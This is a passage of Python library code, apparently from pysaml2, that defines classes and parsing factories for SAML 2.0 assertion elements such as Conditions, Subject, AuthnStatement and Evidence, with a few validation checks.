saml2.create_class_from_xml_string(KeyInfoConfirmationDataType_, xml_string) class ConditionAbstractType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:ConditionAbstractType element """ c_tag = 'ConditionAbstractType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() class Audience(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:Audience element """ c_tag = 'Audience' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def audience_from_string(xml_string): return saml2.create_class_from_xml_string(Audience, xml_string) class OneTimeUseType_(ConditionAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:OneTimeUseType element """ c_tag = 'OneTimeUseType' c_namespace = NAMESPACE c_children = ConditionAbstractType_.c_children.copy() c_attributes = ConditionAbstractType_.c_attributes.copy() c_child_order = ConditionAbstractType_.c_child_order[:] c_cardinality = ConditionAbstractType_.c_cardinality.copy() def one_time_use_type__from_string(xml_string): return saml2.create_class_from_xml_string(OneTimeUseType_, xml_string) class ProxyRestrictionType_(ConditionAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:ProxyRestrictionType element """ c_tag = 'ProxyRestrictionType' c_namespace = NAMESPACE c_children = ConditionAbstractType_.c_children.copy() c_attributes = ConditionAbstractType_.c_attributes.copy() c_child_order = ConditionAbstractType_.c_child_order[:] c_cardinality = ConditionAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Audience'] = 
('audience', [Audience]) c_cardinality['audience'] = {"min": 0} c_attributes['Count'] = ('count', 'nonNegativeInteger', False) c_child_order.extend(['audience']) def __init__(self, audience=None, count=None, text=None, extension_elements=None, extension_attributes=None): ConditionAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.audience = audience or [] self.count = count def proxy_restriction_type__from_string(xml_string): return saml2.create_class_from_xml_string(ProxyRestrictionType_, xml_string) class EncryptedAssertion(EncryptedElementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedAssertion element """ c_tag = 'EncryptedAssertion' c_namespace = NAMESPACE c_children = EncryptedElementType_.c_children.copy() c_attributes = EncryptedElementType_.c_attributes.copy() c_child_order = EncryptedElementType_.c_child_order[:] c_cardinality = EncryptedElementType_.c_cardinality.copy() def encrypted_assertion_from_string(xml_string): return saml2.create_class_from_xml_string(EncryptedAssertion, xml_string) class StatementAbstractType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:StatementAbstractType element """ c_tag = 'StatementAbstractType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() class SubjectLocalityType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectLocalityType element """ c_tag = 'SubjectLocalityType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['Address'] = ('address', 'string', False) c_attributes['DNSName'] = ('dns_name', 'string', False) def __init__(self, address=None, dns_name=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.address = address self.dns_name = dns_name def subject_locality_type__from_string(xml_string): return saml2.create_class_from_xml_string(SubjectLocalityType_, xml_string) class AuthnContextClassRef(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef element """ c_tag = 'AuthnContextClassRef' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def authn_context_class_ref_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContextClassRef, xml_string) class AuthnContextDeclRef(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextDeclRef element """ c_tag = 'AuthnContextDeclRef' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def authn_context_decl_ref_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContextDeclRef, xml_string) class AuthnContextDecl(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextDecl element """ c_tag = 'AuthnContextDecl' c_namespace = NAMESPACE c_value_type = {'base': 'anyType'} c_children = SamlBase.c_children.copy() 
c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def authn_context_decl_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContextDecl, xml_string) class AuthenticatingAuthority(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthenticatingAuthority element """ c_tag = 'AuthenticatingAuthority' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def authenticating_authority_from_string(xml_string): return saml2.create_class_from_xml_string(AuthenticatingAuthority, xml_string) class DecisionType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:DecisionType element """ c_tag = 'DecisionType' c_namespace = NAMESPACE c_value_type = {'base': 'string', 'enumeration': ['Permit', 'Deny', 'Indeterminate']} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def decision_type__from_string(xml_string): return saml2.create_class_from_xml_string(DecisionType_, xml_string) class ActionType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:ActionType element """ c_tag = 'ActionType' c_namespace = NAMESPACE c_value_type = {'base': 'string'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['Namespace'] = ('namespace', 'anyURI', True) def __init__(self, namespace=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.namespace = namespace def action_type__from_string(xml_string): return saml2.create_class_from_xml_string(ActionType_, xml_string) class AttributeValue(AttributeValueBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AttributeValue element """ c_tag = 'AttributeValue' c_namespace = NAMESPACE c_value_type = {'base': 'anyType'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def attribute_value_from_string(xml_string): return saml2.create_class_from_xml_string(AttributeValue, xml_string) class EncryptedAttribute(EncryptedElementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedAttribute element """ c_tag = 'EncryptedAttribute' c_namespace = NAMESPACE c_children = EncryptedElementType_.c_children.copy() c_attributes = EncryptedElementType_.c_attributes.copy() c_child_order = EncryptedElementType_.c_child_order[:] c_cardinality = EncryptedElementType_.c_cardinality.copy() def encrypted_attribute_from_string(xml_string): return saml2.create_class_from_xml_string(EncryptedAttribute, xml_string) class BaseID(BaseIDAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:BaseID element """ c_tag = 'BaseID' c_namespace = NAMESPACE c_children = BaseIDAbstractType_.c_children.copy() c_attributes = BaseIDAbstractType_.c_attributes.copy() c_child_order = BaseIDAbstractType_.c_child_order[:] c_cardinality = BaseIDAbstractType_.c_cardinality.copy() def base_id_from_string(xml_string): return saml2.create_class_from_xml_string(BaseID, xml_string) class NameID(NameIDType_): """The 
urn:oasis:names:tc:SAML:2.0:assertion:NameID element From the Oasis SAML2 Technical Overview: "The <NameID> element within a <Subject> offers the ability to provide name identifiers in a number of different formats. SAML's predefined formats include: Email address, X.509 subject name, Windows domain qualified name, Kerberos principal name, Entity identifier, Persistent identifier, Transient identifier." """ c_tag = 'NameID' c_namespace = NAMESPACE c_children = NameIDType_.c_children.copy() c_attributes = NameIDType_.c_attributes.copy() c_child_order = NameIDType_.c_child_order[:] c_cardinality = NameIDType_.c_cardinality.copy() def name_id_from_string(xml_string): return saml2.create_class_from_xml_string(NameID, xml_string) class SubjectConfirmationData(SubjectConfirmationDataType_): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationData element """ c_tag = 'SubjectConfirmationData' c_namespace = NAMESPACE c_children = SubjectConfirmationDataType_.c_children.copy() c_attributes = SubjectConfirmationDataType_.c_attributes.copy() c_child_order = SubjectConfirmationDataType_.c_child_order[:] c_cardinality = SubjectConfirmationDataType_.c_cardinality.copy() def subject_confirmation_data_from_string(xml_string): return saml2.create_class_from_xml_string(SubjectConfirmationData, xml_string) class Condition(ConditionAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Condition element """ c_tag = 'Condition' c_namespace = NAMESPACE c_children = ConditionAbstractType_.c_children.copy() c_attributes = ConditionAbstractType_.c_attributes.copy() c_child_order = ConditionAbstractType_.c_child_order[:] c_cardinality = ConditionAbstractType_.c_cardinality.copy() def condition_from_string(xml_string): return saml2.create_class_from_xml_string(Condition, xml_string) class AudienceRestrictionType_(ConditionAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AudienceRestrictionType element """ c_tag = 'AudienceRestrictionType' c_namespace = NAMESPACE c_children = ConditionAbstractType_.c_children.copy() c_attributes = ConditionAbstractType_.c_attributes.copy() c_child_order = ConditionAbstractType_.c_child_order[:] c_cardinality = ConditionAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Audience'] = ('audience', [Audience]) c_cardinality['audience'] = {"min": 1} c_child_order.extend(['audience']) def __init__(self, audience=None, text=None, extension_elements=None, extension_attributes=None): ConditionAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.audience = audience or [] def audience_restriction_type__from_string(xml_string): return saml2.create_class_from_xml_string(AudienceRestrictionType_, xml_string) class OneTimeUse(OneTimeUseType_): """The urn:oasis:names:tc:SAML:2.0:assertion:OneTimeUse element """ c_tag = 'OneTimeUse' c_namespace = NAMESPACE c_children = OneTimeUseType_.c_children.copy() c_attributes = OneTimeUseType_.c_attributes.copy() c_child_order = OneTimeUseType_.c_child_order[:] c_cardinality = OneTimeUseType_.c_cardinality.copy() def one_time_use_from_string(xml_string): return saml2.create_class_from_xml_string(OneTimeUse, xml_string) class ProxyRestriction(ProxyRestrictionType_): """The urn:oasis:names:tc:SAML:2.0:assertion:ProxyRestriction element """ c_tag = 'ProxyRestriction' c_namespace = NAMESPACE c_children = ProxyRestrictionType_.c_children.copy() c_attributes = ProxyRestrictionType_.c_attributes.copy() c_child_order = 
ProxyRestrictionType_.c_child_order[:] c_cardinality = ProxyRestrictionType_.c_cardinality.copy() def proxy_restriction_from_string(xml_string): return saml2.create_class_from_xml_string(ProxyRestriction, xml_string) class Statement(StatementAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Statement element """ c_tag = 'Statement' c_namespace = NAMESPACE c_children = StatementAbstractType_.c_children.copy() c_attributes = StatementAbstractType_.c_attributes.copy() c_child_order = StatementAbstractType_.c_child_order[:] c_cardinality = StatementAbstractType_.c_cardinality.copy() def statement_from_string(xml_string): return saml2.create_class_from_xml_string(Statement, xml_string) class SubjectLocality(SubjectLocalityType_): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectLocality element """ c_tag = 'SubjectLocality' c_namespace = NAMESPACE c_children = SubjectLocalityType_.c_children.copy() c_attributes = SubjectLocalityType_.c_attributes.copy() c_child_order = SubjectLocalityType_.c_child_order[:] c_cardinality = SubjectLocalityType_.c_cardinality.copy() def verify(self): if self.address: # dotted-decimal IPv4 or RFC3513 IPv6 address if valid_ipv4(self.address) or valid_ipv6(self.address): pass else: raise ShouldValueError("Not an IPv4 or IPv6 address") elif self.dns_name: valid_domain_name(self.dns_name) return SubjectLocalityType_.verify(self) def subject_locality_from_string(xml_string): return saml2.create_class_from_xml_string(SubjectLocality, xml_string) class AuthnContextType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextType element """ c_tag = 'AuthnContextType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children[ '{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextClassRef'] = ( 'authn_context_class_ref', AuthnContextClassRef) c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextDecl'] = ( 'authn_context_decl', AuthnContextDecl) c_cardinality['authn_context_decl'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextDeclRef'] = ( 'authn_context_decl_ref', AuthnContextDeclRef) c_cardinality['authn_context_decl_ref'] = {"min": 0, "max": 1} c_children[ '{urn:oasis:names:tc:SAML:2.0:assertion}AuthenticatingAuthority'] = ( 'authenticating_authority', [AuthenticatingAuthority]) c_cardinality['authenticating_authority'] = {"min": 0} c_child_order.extend(['authn_context_class_ref', 'authn_context_decl', 'authn_context_decl_ref', 'authenticating_authority']) def __init__(self, authn_context_class_ref=None, authn_context_decl=None, authn_context_decl_ref=None, authenticating_authority=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.authn_context_class_ref = authn_context_class_ref self.authn_context_decl = authn_context_decl self.authn_context_decl_ref = authn_context_decl_ref self.authenticating_authority = authenticating_authority or [] def verify(self): if self.authn_context_decl and self.authn_context_decl_ref: raise Exception( "Invalid Response: " "Cannot have both <AuthnContextDecl> and <AuthnContextDeclRef>" ) return SamlBase.verify(self) def authn_context_type__from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContextType_, xml_string) class Action(ActionType_): """The 
urn:oasis:names:tc:SAML:2.0:assertion:Action element """ c_tag = 'Action' c_namespace = NAMESPACE c_children = ActionType_.c_children.copy() c_attributes = ActionType_.c_attributes.copy() c_child_order = ActionType_.c_child_order[:] c_cardinality = ActionType_.c_cardinality.copy() def action_from_string(xml_string): return saml2.create_class_from_xml_string(Action, xml_string) class AttributeType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AttributeType element """ c_tag = 'AttributeType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AttributeValue'] = ( 'attribute_value', [AttributeValue]) c_cardinality['attribute_value'] = {"min": 0} c_attributes['Name'] = ('name', 'string', True) c_attributes['NameFormat'] = ('name_format', 'anyURI', False) c_attributes['FriendlyName'] = ('friendly_name', 'string', False) c_child_order.extend(['attribute_value']) c_any_attribute = {"namespace": "##other", "processContents": "lax"} def __init__(self, attribute_value=None, name=None, name_format=NAME_FORMAT_URI, friendly_name=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.attribute_value = attribute_value or [] self.name = name self.name_format = name_format self.friendly_name = friendly_name # when consuming such elements, default to NAME_FORMAT_UNSPECIFIED as NameFormat def harvest_element_tree(self, tree): tree.attrib.setdefault('NameFormat', NAME_FORMAT_UNSPECIFIED) SamlBase.harvest_element_tree(self, tree) def attribute_type__from_string(xml_string): return saml2.create_class_from_xml_string(AttributeType_, xml_string) class SubjectConfirmationType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationType element """ c_tag = 'SubjectConfirmationType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}BaseID'] = ('base_id', BaseID) c_cardinality['base_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}NameID'] = ('name_id', NameID) c_cardinality['name_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedID'] = ( 'encrypted_id', EncryptedID) c_cardinality['encrypted_id'] = {"min": 0, "max": 1} c_children[ '{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmationData'] = ( 'subject_confirmation_data', SubjectConfirmationData) c_cardinality['subject_confirmation_data'] = {"min": 0, "max": 1} c_attributes['Method'] = ('method', 'anyURI', True) c_child_order.extend(['base_id', 'name_id', 'encrypted_id', 'subject_confirmation_data']) def __init__(self, base_id=None, name_id=None, encrypted_id=None, subject_confirmation_data=None, method=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.base_id = base_id self.name_id = name_id self.encrypted_id = encrypted_id self.subject_confirmation_data = subject_confirmation_data self.method = method def subject_confirmation_type__from_string(xml_string): return 
saml2.create_class_from_xml_string(SubjectConfirmationType_, xml_string) class AudienceRestriction(AudienceRestrictionType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AudienceRestriction element """ c_tag = 'AudienceRestriction' c_namespace = NAMESPACE c_children = AudienceRestrictionType_.c_children.copy() c_attributes = AudienceRestrictionType_.c_attributes.copy() c_child_order = AudienceRestrictionType_.c_child_order[:] c_cardinality = AudienceRestrictionType_.c_cardinality.copy() def audience_restriction_from_string(xml_string): return saml2.create_class_from_xml_string(AudienceRestriction, xml_string) class AuthnContext(AuthnContextType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContext element """ c_tag = 'AuthnContext' c_namespace = NAMESPACE c_children = AuthnContextType_.c_children.copy() c_attributes = AuthnContextType_.c_attributes.copy() c_child_order = AuthnContextType_.c_child_order[:] c_cardinality = AuthnContextType_.c_cardinality.copy() def authn_context_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnContext, xml_string) class Attribute(AttributeType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Attribute element """ c_tag = 'Attribute' c_namespace = NAMESPACE c_children = AttributeType_.c_children.copy() c_attributes = AttributeType_.c_attributes.copy() c_child_order = AttributeType_.c_child_order[:] c_cardinality = AttributeType_.c_cardinality.copy() def attribute_from_string(xml_string): return saml2.create_class_from_xml_string(Attribute, xml_string) class SubjectConfirmation(SubjectConfirmationType_): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmation element """ c_tag = 'SubjectConfirmation' c_namespace = NAMESPACE c_children = SubjectConfirmationType_.c_children.copy() c_attributes = SubjectConfirmationType_.c_attributes.copy() c_child_order = SubjectConfirmationType_.c_child_order[:] c_cardinality = SubjectConfirmationType_.c_cardinality.copy() def subject_confirmation_from_string(xml_string): return saml2.create_class_from_xml_string(SubjectConfirmation, xml_string) class ConditionsType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:ConditionsType element """ c_tag = 'ConditionsType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Condition'] = ( 'condition', [Condition]) c_cardinality['condition'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AudienceRestriction'] = ( 'audience_restriction', [AudienceRestriction]) c_cardinality['audience_restriction'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}OneTimeUse'] = ( 'one_time_use', [OneTimeUse]) c_cardinality['one_time_use'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}ProxyRestriction'] = ( 'proxy_restriction', [ProxyRestriction]) c_cardinality['proxy_restriction'] = {"min": 0} c_attributes['NotBefore'] = ('not_before', 'dateTime', False) c_attributes['NotOnOrAfter'] = ('not_on_or_after', 'dateTime', False) c_child_order.extend(['condition', 'audience_restriction', 'one_time_use', 'proxy_restriction']) def __init__(self, condition=None, audience_restriction=None, one_time_use=None, proxy_restriction=None, not_before=None, not_on_or_after=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, 
extension_attributes=extension_attributes) self.condition = condition or [] self.audience_restriction = audience_restriction or [] self.one_time_use = one_time_use or [] self.proxy_restriction = proxy_restriction or [] self.not_before = not_before self.not_on_or_after = not_on_or_after def verify(self): if self.one_time_use: if len(self.one_time_use) != 1: raise Exception("Cannot be used more than once") if self.proxy_restriction: if len(self.proxy_restriction) != 1: raise Exception("Cannot be used more than once") return SamlBase.verify(self) def conditions_type__from_string(xml_string): return saml2.create_class_from_xml_string(ConditionsType_, xml_string) class AuthnStatementType_(StatementAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnStatementType element """ c_tag = 'AuthnStatementType' c_namespace = NAMESPACE c_children = StatementAbstractType_.c_children.copy() c_attributes = StatementAbstractType_.c_attributes.copy() c_child_order = StatementAbstractType_.c_child_order[:] c_cardinality = StatementAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}SubjectLocality'] = ( 'subject_locality', SubjectLocality) c_cardinality['subject_locality'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContext'] = ( 'authn_context', AuthnContext) c_attributes['AuthnInstant'] = ('authn_instant', 'dateTime', True) c_attributes['SessionIndex'] = ('session_index', 'string', False) c_attributes['SessionNotOnOrAfter'] = ('session_not_on_or_after', 'dateTime', False) c_child_order.extend(['subject_locality', 'authn_context']) def __init__(self, subject_locality=None, authn_context=None, authn_instant=None, session_index=None, session_not_on_or_after=None, text=None, extension_elements=None, extension_attributes=None): StatementAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.subject_locality = subject_locality self.authn_context = authn_context self.authn_instant = authn_instant self.session_index = session_index self.session_not_on_or_after = session_not_on_or_after def authn_statement_type__from_string(xml_string): return saml2.create_class_from_xml_string(AuthnStatementType_, xml_string) class AttributeStatementType_(StatementAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AttributeStatementType element """ c_tag = 'AttributeStatementType' c_namespace = NAMESPACE c_children = StatementAbstractType_.c_children.copy() c_attributes = StatementAbstractType_.c_attributes.copy() c_child_order = StatementAbstractType_.c_child_order[:] c_cardinality = StatementAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Attribute'] = ( 'attribute', [Attribute]) c_cardinality['attribute'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAttribute'] = ( 'encrypted_attribute', [EncryptedAttribute]) c_cardinality['encrypted_attribute'] = {"min": 0} c_child_order.extend(['attribute', 'encrypted_attribute']) def __init__(self, attribute=None, encrypted_attribute=None, text=None, extension_elements=None, extension_attributes=None): StatementAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.attribute = attribute or [] self.encrypted_attribute = encrypted_attribute or [] def attribute_statement_type__from_string(xml_string): return saml2.create_class_from_xml_string(AttributeStatementType_, xml_string) class 
SubjectType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectType element """ c_tag = 'SubjectType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}BaseID'] = ('base_id', BaseID) c_cardinality['base_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}NameID'] = ('name_id', NameID) c_cardinality['name_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedID'] = ( 'encrypted_id', EncryptedID) c_cardinality['encrypted_id'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmation'] = ( 'subject_confirmation', [SubjectConfirmation]) c_cardinality['subject_confirmation'] = {"min": 0} c_child_order.extend(['base_id', 'name_id', 'encrypted_id', 'subject_confirmation']) def __init__(self, base_id=None, name_id=None, encrypted_id=None, subject_confirmation=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.base_id = base_id self.name_id = name_id self.encrypted_id = encrypted_id self.subject_confirmation = subject_confirmation or [] def subject_type__from_string(xml_string): return saml2.create_class_from_xml_string(SubjectType_, xml_string) class Conditions(ConditionsType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Conditions element """ c_tag = 'Conditions' c_namespace = NAMESPACE c_children = ConditionsType_.c_children.copy() c_attributes = ConditionsType_.c_attributes.copy() c_child_order = ConditionsType_.c_child_order[:] c_cardinality = ConditionsType_.c_cardinality.copy() def conditions_from_string(xml_string): return saml2.create_class_from_xml_string(Conditions, xml_string) class AuthnStatement(AuthnStatementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthnStatement element """ c_tag = 'AuthnStatement' c_namespace = NAMESPACE c_children = AuthnStatementType_.c_children.copy() c_attributes = AuthnStatementType_.c_attributes.copy() c_child_order = AuthnStatementType_.c_child_order[:] c_cardinality = AuthnStatementType_.c_cardinality.copy() def authn_statement_from_string(xml_string): return saml2.create_class_from_xml_string(AuthnStatement, xml_string) class AttributeStatement(AttributeStatementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AttributeStatement element """ c_tag = 'AttributeStatement' c_namespace = NAMESPACE c_children = AttributeStatementType_.c_children.copy() c_attributes = AttributeStatementType_.c_attributes.copy() c_child_order = AttributeStatementType_.c_child_order[:] c_cardinality = AttributeStatementType_.c_cardinality.copy() def attribute_statement_from_string(xml_string): return saml2.create_class_from_xml_string(AttributeStatement, xml_string) class Subject(SubjectType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Subject element """ c_tag = 'Subject' c_namespace = NAMESPACE c_children = SubjectType_.c_children.copy() c_attributes = SubjectType_.c_attributes.copy() c_child_order = SubjectType_.c_child_order[:] c_cardinality = SubjectType_.c_cardinality.copy() def subject_from_string(xml_string): return saml2.create_class_from_xml_string(Subject, xml_string) #.................. 
# ['AuthzDecisionStatement', 'EvidenceType', 'AdviceType', 'Evidence', # 'Assertion', 'AssertionType', 'AuthzDecisionStatementType', 'Advice'] class EvidenceType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:EvidenceType element """ c_tag = 'EvidenceType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionIDRef'] = ( 'assertion_id_ref', [AssertionIDRef]) c_cardinality['assertion_id_ref'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionURIRef'] = ( 'assertion_uri_ref', [AssertionURIRef]) c_cardinality['assertion_uri_ref'] = {"min": 0} c_cardinality['assertion'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAssertion'] = ( 'encrypted_assertion', [EncryptedAssertion]) c_cardinality['encrypted_assertion'] = {"min": 0} c_child_order.extend(['assertion_id_ref', 'assertion_uri_ref', 'assertion', 'encrypted_assertion']) def __init__(self, assertion_id_ref=None, assertion_uri_ref=None, assertion=None, encrypted_assertion=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.assertion_id_ref = assertion_id_ref or [] self.assertion_uri_ref = assertion_uri_ref or [] self.assertion = assertion or [] self.encrypted_assertion = encrypted_assertion or [] def evidence_type__from_string(xml_string): return saml2.create_class_from_xml_string(EvidenceType_, xml_string) class Evidence(EvidenceType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Evidence element """ c_tag = 'Evidence' c_namespace = NAMESPACE c_children = EvidenceType_.c_children.copy() c_attributes = EvidenceType_.c_attributes.copy() c_child_order = EvidenceType_.c_child_order[:] c_cardinality = EvidenceType_.c_cardinality.copy() def evidence_from_string(xml_string): return saml2.create_class_from_xml_string(Evidence, xml_string) class AuthzDecisionStatementType_(StatementAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthzDecisionStatementType element """ c_tag = 'AuthzDecisionStatementType' c_namespace = NAMESPACE c_children = StatementAbstractType_.c_children.copy() c_attributes = StatementAbstractType_.c_attributes.copy() c_child_order = StatementAbstractType_.c_child_order[:] c_cardinality = StatementAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Action'] = ( 'action', [Action]) c_cardinality['action'] = {"min": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Evidence'] = ( 'evidence', Evidence) c_cardinality['evidence'] = {"min": 0, "max": 1} c_attributes['Resource'] = ('resource', 'anyURI', True) c_attributes['Decision'] = ('decision', DecisionType_, True) c_child_order.extend(['action', 'evidence']) def __init__(self, action=None, evidence=None, resource=None, decision=None, text=None, extension_elements=None, extension_attributes=None): StatementAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.action = action or [] self.evidence = evidence self.resource = resource 